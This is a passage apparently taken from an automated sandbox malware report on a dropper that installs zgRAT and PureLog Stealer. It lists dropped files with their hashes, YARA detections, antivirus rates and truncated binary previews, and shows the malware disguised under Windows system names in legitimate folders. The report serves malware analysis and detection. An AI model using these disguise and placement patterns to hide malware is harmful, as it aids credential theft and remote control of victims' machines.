                                                                                  Entropy (8bit):5.848218281199536
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:m2kl1xVE/DvdxnwuT2gqr4Db4ywvZGfl+IjDCg9CdRPjqL:BJbHwuagN90Gd4PjqL
                                                                                  MD5:6F5F499D50D2B07809949BF20BAE9C57
                                                                                  SHA1:6469A3D6B6E99A0720081DAA8921491CDBB55DC4
                                                                                  SHA-256:B789BDE69565E67E2CEB4BC23C563C5C8D27DF20F7000EF6F3973DBDCC3A40C9
                                                                                  SHA-512:FE03548F50A227CDEE9909E75AE4D4DF1435855C3E3B97038BA3A64433FED6D4237872D3E24EBF0E2D5CDED4286F48C54150BB2B533F3BC1D1D72FDF4F282330
                                                                                  Malicious:false
                                                                                  Preview:YCMl5YVVaVyjPxRfYaHynzARHvWA6mNRyETzzHHK4TYY8qf9Yk065n7jB4dKBVYyHgvKdcpQT63UalTbPXmWvRWKHux5o7Jj5kQb5Vg54jm9unIalC4otBC0KlDspumWwUY0V1f40qcMpWZemXTlCez3iaRURxQJ6QMaORFtgAxDizKxLjFRaBUSeeS4kLmDZSPYK9QVSkEBqwVsPdJsr8s5646t8KJVXunPkvnLTu906SlrJkoGC4VakTcQDgWHato6IFId07Y7929nTOjYgDTcZNpQTXIwX1ZNnpiEcKQFfXarTz7z78lXZLg5Z1KcymjHcwAnpe5VwO6Bw76daTzYQCxcInpk9xQ3xTPhzTJcCPkLOeJb4qCfxL0a8hfBzVV97DOcsYoHJWVBblNneNpTvvGmcyjRxHmr4lOLQqtgC5Vazz9WT1hmpCNM7lA3zXTCunGzXCXyeJR0ZpxnzM75kAC1XBNpqzqolTqLsJ8RetIfvXxRxWDmaYbtlPbWysHocmPF9m4pOpb02hGAO61TvEON16kdsmcwldCIIrSLcXYu6k1DJbH20y3YYBOCCa7lNpPZe71gop0XqdQQEgURek

                                                                                  C:\Program Files (x86)\Microsoft.NET\RuntimeBroker.exe

                                                                                  Download File
                                                                                  Process:C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):3284992
                                                                                  Entropy (8bit):4.694992410471207
                                                                                  Encrypted:false
                                                                                  SSDEEP:24576:sW0xzjWom1zfPkDpxnY/Pfo5kC4R1xyPKTRa/wtVM1Mez3VXFu5Yx3:sZafWppGQ54yoRdez3VVu5Yx
                                                                                  MD5:0D30B2D3FD8DB7AE5EDC0455DA8DC8E9
                                                                                  SHA1:16DB688EB2B4E8B465AB18587FFB65EDD639B989
                                                                                  SHA-256:23DFBD08FCA53DCB25B0F76B6D24ABF02EB2349BC43C975BACD3776B52241FAF
                                                                                  SHA-512:0F15D35FF2821BA43A21C036C5DB79AE52FDF69681EBB64ED80F963A923346FE7466AD39351A2110E119AD16DCC4B30FBBC61950C6D3B115A6816CD770B028C4
                                                                                  Malicious:true
                                                                                  Yara Hits:
                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Microsoft.NET\RuntimeBroker.exe, Author: Joe Security
                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Microsoft.NET\RuntimeBroker.exe, Author: Joe Security
                                                                                  Antivirus:
                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  • Antivirus: ReversingLabs, Detection: 83%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....kg................................. ........@.. ....................... ............@.....................................K....... ............................................................................ ............... ..H............text....... ...................... ..`.rsrc... ...........................@....reloc..............................@..B........................H...........................P............................................0..........(.... ........8........E....*.......N.......8%...*(.... ....~....{....9....& ....8....(.... ....~....{....:....& ....8....(.... ....~....{....:....& ....8y......0.......... ........8........E................k...*.......8.......... ....~....{....9....& ....8........~....(Z...~....(^... ....<~... ....~....{....:....& ....8x...~....:`... ....8d...~....(R... .... .... ....s....~....(V....... ....~

                                                                                  C:\Program Files\Adobe\Acrobat DC\Resource\9e8d7a4ca61bd9

                                                                                  Download File
                                                                                  Process:C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  File Type:ASCII text, with very long lines (538), with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):538
                                                                                  Entropy (8bit):5.868311608471381
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TrnYnWKgeLObtsx527DzcimXQ9Pg7fVZ1ql0lIgU9Ig3wKtAsUVxjyS:3QWK+BsveZIj1q4IWghijZ1
                                                                                  MD5:67065A3C6F53B886BFC0F23689039505
                                                                                  SHA1:76F62D89C324750FCAE13D223BD7046FC98CC1BD
                                                                                  SHA-256:F86B3681361BBCEC17919F83E5ADDDD647C529B2C3F07C70B5E375D6520C149A
                                                                                  SHA-512:CAD984F2A375F9A1E2D0DA225DED87A1E07A0153AA36FFE7256F8DF1C7748CAA2D30A5A211BD27B3D46E88C0ED0AD06299A3DDC6E5F08FE022066FCC634DCD01
                                                                                  Malicious:false
                                                                                  Preview:MellmN8EbQO6YBSnrDnYbsl5c2aWEIK7C5CUSxonwca8b4dcdozB6eFd3pJuxmATGQ4d97V4Y9l8RmdiY72ZTIBh0iano40KcH2LAAdfT5n72GMQLkWztk97PXnagrPdIbgKuSiYeXGXfDotWKbDiAa1H45nWC8lpJybkBf2C7UWembMs4EWPM5IAoDzX5CcYerWONIUojAkpEXeds4c7mWdNqa68qfH527A4F7fvtsqLUc6RiWoAjewIOIiwMW8E3pxGWkXvYrO3pR2OeoZT0GVYL2p6ZtiXtmSppz4893m2Q2c6PUSi6pOwTY5e4bVpI0KD9NiotbU6edITZtqFaAaEYgVQ4aDhi7uZsZ7CvoyeVRS0QmELuQOHaFod1RuTYwYhsskAvoTwM5tGOfASW2xRsm9mueKd4eGi3vHhBDZG6c5eWiPWRb7f9GyGt8QRez2ryKNcXcQScrUPqeQMPxMchljx6AyDxIlHkOpLVw9zKpCSviaOrDBqnZJNkZgWoNeUFNpczF1dxWR2iRBXkjVuG

                                                                                  C:\Program Files\Adobe\Acrobat DC\Resource\RuntimeBroker.exe

                                                                                  Download File
                                                                                  Process:C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):3284992
                                                                                  Entropy (8bit):4.694992410471207
                                                                                  Encrypted:false
                                                                                  SSDEEP:24576:sW0xzjWom1zfPkDpxnY/Pfo5kC4R1xyPKTRa/wtVM1Mez3VXFu5Yx3:sZafWppGQ54yoRdez3VVu5Yx
                                                                                  MD5:0D30B2D3FD8DB7AE5EDC0455DA8DC8E9
                                                                                  SHA1:16DB688EB2B4E8B465AB18587FFB65EDD639B989
                                                                                  SHA-256:23DFBD08FCA53DCB25B0F76B6D24ABF02EB2349BC43C975BACD3776B52241FAF
                                                                                  SHA-512:0F15D35FF2821BA43A21C036C5DB79AE52FDF69681EBB64ED80F963A923346FE7466AD39351A2110E119AD16DCC4B30FBBC61950C6D3B115A6816CD770B028C4
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 83%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....kg................................. ........@.. ....................... ............@.....................................K....... ............................................................................ ............... ..H............text....... ...................... ..`.rsrc... ...........................@....reloc..............................@..B........................H...........................P............................................0..........(.... ........8........E....*.......N.......8%...*(.... ....~....{....9....& ....8....(.... ....~....{....:....& ....8....(.... ....~....{....:....& ....8y......0.......... ........8........E................k...*.......8.......... ....~....{....9....& ....8........~....(Z...~....(^... ....<~... ....~....{....:....& ....8x...~....:`... ....8d...~....(R... .... .... ....s....~....(V....... ....~

                                                                                  C:\Recovery\6dd19aba3e2428

                                                                                  Download File
                                                                                  Process:C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  File Type:ASCII text, with very long lines (629), with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):629
                                                                                  Entropy (8bit):5.892149818729766
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:r8GoxMUJArWHJDE5KsGc0pAZe5vPrePnFegrSppX0H5olhAJVvx:r8GrwK9xmPry8gYaH5Y6JVp
                                                                                  MD5:5F65F46A650054AD3A52F19E0320D855
                                                                                  SHA1:262F76293ABA34FDAB15BBD27F8720174F8A91D4
                                                                                  SHA-256:F0580BD17D9E3899754918D40B81F80D9BBC1596F5F1E9A27A8AE344895D14C0
                                                                                  SHA-512:6D664663FEA4E68C652F9D1AFEB4310EEBF86432903B4A54719F4552EF72EA58F7172408D53C336C060B097058B5E665078A9318194D839B049E44F8D5549DAE
                                                                                  Malicious:false
                                                                                  Preview:K7LsMh38ZmMi2QIRpSYIwF1uNJueXXe6NLMUrzEddmJthiCMCxwRgH0FFbfDxZkCIQVrEyjzO4oJ6IMpHhckkMZGUGOQUBpEBGkQMUINN6DmcqJ6O05Q7Ac61PX7jTfMOjIzh5cxYOWnIxon7SBdGZHBooZ77Ko3b1X2iUYSXI2soyxEktARRBGzcHK3ge0NjcMQZvEn3tG8gYW00VWNKWlZvhabJfw2RoILmgozoWYi5HSDuUCKHmDN1wf1VndY6Nq2PLNUqhix8CdnPWrzdluol5UzBwdB3AmsbaxiGsekEPPyS1m95o5VcBRU1YS3Eg47avLzjJsuHKkVqggJKeGOFRPaJcqsZkfiURXhpxZv6KNRb5oV1ItkZq2JfvpGcAVhoCBYI9dWEUS4D89NyV0Q05IoYOB4HTT6zqmY3PM2oWgFX7FhwcRHJEqt3W948jPuBVFXVkUiI8ldZDQbIdHpBMwu93fhQS3FHvDC1sLMIs8KcNU0GivecjsziVXcFwSzEgWn9OjZR5hSNmRwiobrhZmhCOdgVtGVaJG60r119VMgCZl6Dk4aVlSp3ykuvCEiyM2EfV51xjrLMGfnngcuyq9y0bCCGGG6Rnr0ghbsoCmv3GcxT

                                                                                  C:\Recovery\ApplicationFrameHost.exe

                                                                                  Download File
                                                                                  Process:C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):3284992
                                                                                  Entropy (8bit):4.694992410471207
                                                                                  Encrypted:false
                                                                                  SSDEEP:24576:sW0xzjWom1zfPkDpxnY/Pfo5kC4R1xyPKTRa/wtVM1Mez3VXFu5Yx3:sZafWppGQ54yoRdez3VVu5Yx
                                                                                  MD5:0D30B2D3FD8DB7AE5EDC0455DA8DC8E9
                                                                                  SHA1:16DB688EB2B4E8B465AB18587FFB65EDD639B989
                                                                                  SHA-256:23DFBD08FCA53DCB25B0F76B6D24ABF02EB2349BC43C975BACD3776B52241FAF
                                                                                  SHA-512:0F15D35FF2821BA43A21C036C5DB79AE52FDF69681EBB64ED80F963A923346FE7466AD39351A2110E119AD16DCC4B30FBBC61950C6D3B115A6816CD770B028C4
                                                                                  Malicious:true
                                                                                  Yara Hits:
                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\ApplicationFrameHost.exe, Author: Joe Security
                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\ApplicationFrameHost.exe, Author: Joe Security
                                                                                  Antivirus:
                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  • Antivirus: ReversingLabs, Detection: 83%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....kg................................. ........@.. ....................... ............@.....................................K....... ............................................................................ ............... ..H............text....... ...................... ..`.rsrc... ...........................@....reloc..............................@..B........................H...........................P............................................0..........(.... ........8........E....*.......N.......8%...*(.... ....~....{....9....& ....8....(.... ....~....{....:....& ....8....(.... ....~....{....:....& ....8y......0.......... ........8........E................k...*.......8.......... ....~....{....9....& ....8........~....(Z...~....(^... ....<~... ....~....{....:....& ....8x...~....:`... ....8d...~....(R... .... .... ....s....~....(V....... ....~

                                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\DONEBnCAFZiOynZWpVVmZLvNQeA.exe.log

                                                                                  Download File
                                                                                  Process:C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exe
                                                                                  File Type:CSV text
                                                                                  Category:dropped
                                                                                  Size (bytes):847
                                                                                  Entropy (8bit):5.354334472896228
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                                                  MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                                                  SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                                                  SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                                                  SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                                                  Malicious:false
                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

                                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\agentFont.exe.log

                                                                                  Download File
                                                                                  Process:C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  File Type:CSV text
                                                                                  Category:dropped
                                                                                  Size (bytes):1306
                                                                                  Entropy (8bit):5.353303787007226
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUN+E4KlOU4mZsXE4Npv:MxHKQwYHKGSI6oPtHTHhAHKKk+HKlT4T
                                                                                  MD5:BD55EA7BCC4484ED7DE5C6F56A64EF15
                                                                                  SHA1:76CBF3B5E5A83EC67C4381F697309877F0B20BBE
                                                                                  SHA-256:81E0A3669878ED3FFF8E565607FB86C5478D7970583E7010D191A8BC4E5066B6
                                                                                  SHA-512:B50A3F8F5D18D3F1C85A6A5C9A46258B1D6930B75C847F0FB6E0A7CD0627E4690125BB3171A2D6554DEBE240ADAB2FF23ABDECA9959357B48089CFBF1F0D9FD8
                                                                                  Malicious:false
                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\Syste

                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:data
                                                                                  Category:modified
                                                                                  Size (bytes):64
                                                                                  Entropy (8bit):1.1940658735648508
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Nlllulbnolz:NllUc
                                                                                  MD5:F23953D4A58E404FCB67ADD0C45EB27A
                                                                                  SHA1:2D75B5CACF2916C66E440F19F6B3B21DFD289340
                                                                                  SHA-256:16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
                                                                                  SHA-512:B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
                                                                                  Malicious:false
                                                                                  Preview:@...e................................................@..........

                                                                                  C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exe

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\QH67JSdZWl.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):3568371
                                                                                  Entropy (8bit):4.915055948000566
                                                                                  Encrypted:false
                                                                                  SSDEEP:24576:hTbBv5rUlGjW0xzjWom1zfPkDpxnY/Pfo5kC4R1xyPKTRa/wtVM1Mez3VXFu5YxW:rB7jZafWppGQ54yoRdez3VVu5YxW
                                                                                  MD5:FEB773E3FB046E0D1F39450C703492CA
                                                                                  SHA1:282CB72366FD980F7AD022F0BD5B3B712696256C
                                                                                  SHA-256:6F91BDCD3C2805D9D4A8577E58E6C5B4B09C05316FB2D30DA531DD2422A7CAE1
                                                                                  SHA-512:CCCCB9EBB22C947A769B1472F7D7C8162115BF326D9F91A5A000A7854B9E211B22A4EC2E12DC7C66453FCFC316831140A28FF4E5509720C72DB1D523641A9055
                                                                                  Malicious:true
                                                                                  Yara Hits:
                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exe, Author: Joe Security
                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exe, Author: Joe Security
                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exe, Author: Joe Security
                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exe, Author: Joe Security
                                                                                  Antivirus:
                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  • Antivirus: ReversingLabs, Detection: 83%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I.>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I.=>...I..=>..Rich<>..........PE..L..... b.....................h......0........0....@...................................6...@.........................p...4.......P....@...H......................<#......T............................U..@............0..x....... ....................text............................... ..`.rdata.......0....... ..............@..@.data... G..........................@....didat.......0......................@....rsrc....H...@...J..................@..@.reloc..<#.......$...,..............@..B................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\mf04Loader.dll

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\QH67JSdZWl.exe
                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):120432
                                                                                  Entropy (8bit):6.602841735473839
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:R9TXF5YXWbj8qr51XlN+dULTCe1IGhKWyxLiyaXYaWEoecbdhUoTtHez9FazR:REnsvReGsWyxLizXFCecbd1Tt+i1
                                                                                  MD5:943FC74C2E39FE803D828CCFA7E62409
                                                                                  SHA1:4E55D591111316027AE4402DFDFCF8815D541727
                                                                                  SHA-256:DA72E6677BD1BCD01C453C1998AAA19AEAF6659F4774CF6848409DA8232A95B2
                                                                                  SHA-512:96E9F32E89AEE6FAEA6E5A3EDC411F467F13B35EE42DD6F071723DAEBA57F611DBD4FF2735BE26BB94223B5EC4EE1DFFEDF8DC744B936C32A27D17B471E37DCF
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......w..E3f..3f..3f..x...1f..:.].8f..3f...f..3f..2f.."...#f.."...,f.."...&f.."...2f..".1.2f.."...2f..Rich3f..................PE..d....<............" ...*.$...d......................................................k.....`A........................................0u..4...d}..........................pP...........^..p............................\..@............@...............................text............................... ..`fothk........0...................... ..`.rdata...C...@...D...(..............@..@.data................l..............@....pdata...............p..............@..@_RDATA...............|..............@..@.rsrc................~..............@..@.reloc..............................@..B........................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0ezkxc04.0rt.ps1

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3l5ghr2w.qoc.psm1

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bdiqij0w.g0w.ps1

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cbecjcp0.jzt.psm1

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dlrfzlif.ueu.ps1

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_elmiindq.gem.ps1

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ewlhhn1w.03f.psm1

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gvvnxopo.lpu.psm1

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
